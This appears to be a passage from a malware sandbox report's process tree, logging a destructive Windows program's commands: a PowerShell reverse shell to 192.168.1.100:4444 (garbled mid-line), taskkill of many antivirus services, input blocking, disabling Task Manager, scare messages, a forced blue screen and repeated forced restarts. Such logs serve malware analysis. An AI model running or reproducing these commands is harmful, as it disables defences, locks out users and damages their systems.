        PID:1048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        17⤵
        
        PID:556
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        17⤵
        
        PID:1956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        17⤵
        
        PID:2376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        17⤵
        
        PID:2344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        17⤵
        
        PID:1664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        17⤵
        
        PID:2328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        17⤵
        
        PID:276
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        17⤵
        Kills process with taskkill
        
        PID:3048
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        17⤵
        Kills process with taskkill
        
        PID:2408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        17⤵
        
        PID:2660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        17⤵
        
        PID:1580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        17⤵
        Kills process with taskkill
        
        PID:2060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        17⤵
        Kills process with taskkill
        
        PID:2024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        17⤵
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\laborzmi.cmdline"
        16⤵
        
        PID:316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\glo0l2ya.cmdline"
        16⤵
        
        PID:1488
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4D6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC4C5.tmp"
        17⤵
        
        PID:2496
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        15⤵
        
        PID:2348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        15⤵
        
        PID:2800
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\imtdvva4.cmdline"
        16⤵
        
        PID:3028
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB4C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCB4B.tmp"
        17⤵
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        15⤵
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        15⤵
        
        PID:1628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        15⤵
        Kills process with taskkill
        
        PID:2136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        15⤵
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        15⤵
        
        PID:1144
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        15⤵
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        15⤵
        
        PID:796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        15⤵
        
        PID:2152
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        15⤵
        
        PID:2352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        15⤵
        Kills process with taskkill
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        15⤵
        
        PID:1800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        15⤵
        
        PID:2196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        15⤵
        
        PID:2392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        15⤵
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        15⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lfl0k6ju.cmdline"
        14⤵
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n-niqmpq.cmdline"
        14⤵
        
        PID:1616
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4A7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC4A6.tmp"
        15⤵
        
        PID:2248
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        13⤵
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        13⤵
        
        PID:1960
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w9ceg1ma.cmdline"
        14⤵
        
        PID:2976
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC997.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC996.tmp"
        15⤵
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        13⤵
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        13⤵
        
        PID:1976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        13⤵
        
        PID:1100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        13⤵
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        13⤵
        
        PID:2920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        13⤵
        Kills process with taskkill
        
        PID:2592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        13⤵
        
        PID:2324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        13⤵
        
        PID:1608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        13⤵
        
        PID:2976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        13⤵
        Kills process with taskkill
        
        PID:344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        13⤵
        
        PID:1304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        13⤵
        Kills process with taskkill
        
        PID:1188
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        13⤵
        
        PID:3056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        13⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1664
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bo3j6foj.cmdline"
        14⤵
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1316
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crmmvk5h.cmdline"
        12⤵
        
        PID:888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jscizqe-.cmdline"
        12⤵
        
        PID:1784
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF5A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBF59.tmp"
        13⤵
        
        PID:2280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        11⤵
        
        PID:1312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iihmfk-r.cmdline"
        12⤵
        
        PID:1356
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC41B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC41A.tmp"
        13⤵
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        11⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        11⤵
        
        PID:2180
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        11⤵
        
        PID:316
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        11⤵
        
        PID:3004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        11⤵
        Kills process with taskkill
        
        PID:1608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        11⤵
        
        PID:2928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        11⤵
        Kills process with taskkill
        
        PID:904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        11⤵
        
        PID:2312
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        11⤵
        
        PID:280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        11⤵
        
        PID:796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        11⤵
        
        PID:1660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        11⤵
        
        PID:2772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        11⤵
        
        PID:2032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2540
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fxsyyzjj.cmdline"
        12⤵
        
        PID:1892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
        11⤵
        
        PID:2596
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iisfisi9.cmdline"
        12⤵
        
        PID:2912
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1792
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1888
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1356
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2636
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1512
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1536
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1488
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1048
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2408
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2960
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:184
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1536
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:288
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2500
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1740
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2928
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2368
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2612
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1756
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2392
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2500
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1380
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1644
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2668
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3020
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2260
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2196
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2128
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2968
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:896
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2124
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1888
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1644
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2936
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1904
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1340
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1880
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1844
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2496
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1888
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1160
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2684
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1060
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1068
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2460
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:784
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1588
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1860
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2080
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3004
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2900
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2740
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:604
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2800
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1368
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:984
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2716
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2060
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:3068
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2344
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1220
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2444
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1664
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1976
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2972
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2768
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2992
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2668
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:280
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:1760
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2236
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:872
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2196
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:580
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2300
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2296
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:2416
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:984
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
        PID:904
        
        C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        11⤵
        
